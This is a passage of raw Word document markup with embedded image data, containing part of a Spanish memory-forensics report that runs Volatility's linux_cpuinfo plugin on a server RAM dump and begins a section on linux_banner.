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&#10;3S6yyOU9f/E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3Suf&#10;SpkDAAAgCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA&#10;duo0ceiSAADokgAAFAAAAAAAAAAAAAAAAAD/BQAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAU&#10;AAYACAAAACEA5tzQTt0AAAAHAQAADwAAAAAAAAAAAAAAAAAZmQAAZHJzL2Rvd25yZXYueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAI5oAAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAFpsAAAAA&#10;">
                <v:shape id="Imagen 26" o:spid="_x0000_s1097" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:37979;height:6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rYYyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8Iw&#10;GMbvg32H8A68DE0nndjOKE4QdvEw9eDxpXlt6po3JYm226dfDoLHh+cfv8VqsK24kQ+NYwVvkwwE&#10;ceV0w7WC42E7noMIEVlj65gU/FKA1fL5aYGldj1/020fa5FGOJSowMTYlVKGypDFMHEdcfLOzluM&#10;Sfpaao99GretnGbZTFpsOD0Y7GhjqPrZX62Czbk/7S5/V0+9C+t892q23eVTqdHLsP4AEWmIj/C9&#10;/aUVFHk2y9+LIkEkpIQDcvkPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATMq2GMkAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId148" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1098" type="#_x0000_t202" style="position:absolute;left:38386;top:603;width:16072;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6iwyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NSgMx&#10;EL4LvkMYwYvYxNptZW1aSlHQXoprL96GzXSzupksSbZd394Igsf5/me5Hl0nThRi61nD3USBIK69&#10;abnRcHh/vn0AEROywc4zafimCOvV5cUSS+PP/EanKjUih3AsUYNNqS+ljLUlh3Hie+LMHX1wmPIZ&#10;GmkCnnO46+RUqbl02HJusNjT1lL9VQ1Ow372sbc3w/Fpt5ndh9fDsJ1/NpXW11fj5hFEojH9i//c&#10;LybPV4tCTYtiUcDvTxkAufoBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAMD+osMkAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4AD77F07" w14:textId="48B52B6F" w:rsidR="00300365" w:rsidRPr="004809BD" w:rsidRDefault="00300365" w:rsidP="00300365">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>24</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="67" w:name="_Toc155782591"/>
                        <w:r w:rsidR="001C1ADA">
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="005F2ED8">
                          <w:t>linux_cpuinfo.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="67"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ello, situados en </w:t>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ejecutaremos </w:t>
      </w:r>
      <w:bookmarkStart w:id="68" w:name="_Hlk155705681"/>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_cpuinfo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDC2AD" w14:textId="1D95CAD2" w:rsidR="00300365" w:rsidRDefault="00300365" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB3D73B" w14:textId="131BF514" w:rsidR="00B97A1E" w:rsidRPr="00B97A1E" w:rsidRDefault="00B97A1E" w:rsidP="00B97A1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Anexo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155718713 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>VII. Comando linux_cpuinfo.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609ECF3" w14:textId="0C7C8041" w:rsidR="009B1250" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al comprobar que el perfil funciona, obtenemos que solo hay un procesador de marca GenuineIntel modelo Intel(R) Xeon(R) CPU</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CPU (Central Processing Unit): Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento.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3309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> E5-2676 v3 que tiene una frecuencia de 2.4Ghz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F9FDD" w14:textId="0B10E0C1" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:t>Linux_banner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163446DE" w14:textId="5B3B9910" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="00B97A1E" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251751424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78F6E4B3" wp14:editId="078ABCC3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>844799</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5370830" cy="461645"/>
                <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="748818488" name="Grupo 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5370830" cy="461645"/>
                          <a:chOff x="31805" y="-14550"/>
                          <a:chExt cx="5371438" cy="461645"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1566547845" name="Imagen 2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31805" y="-14550"/>
                            <a:ext cx="3804285" cy="461645"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="118301657" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3856383" y="31805"/>
                            <a:ext cx="1546860" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6DA35D3A" w14:textId="139E4F5E" w:rsidR="00300365" w:rsidRPr="00B168FF" w:rsidRDefault="00300365" w:rsidP="00300365">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>25</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="69" w:name="_Toc155782592"/>
                              <w:r w:rsidR="001C1ADA">
                                <w:t xml:space="preserve">Comando </w:t>
                              </w:r>
                              <w:r w:rsidRPr="0040581F">
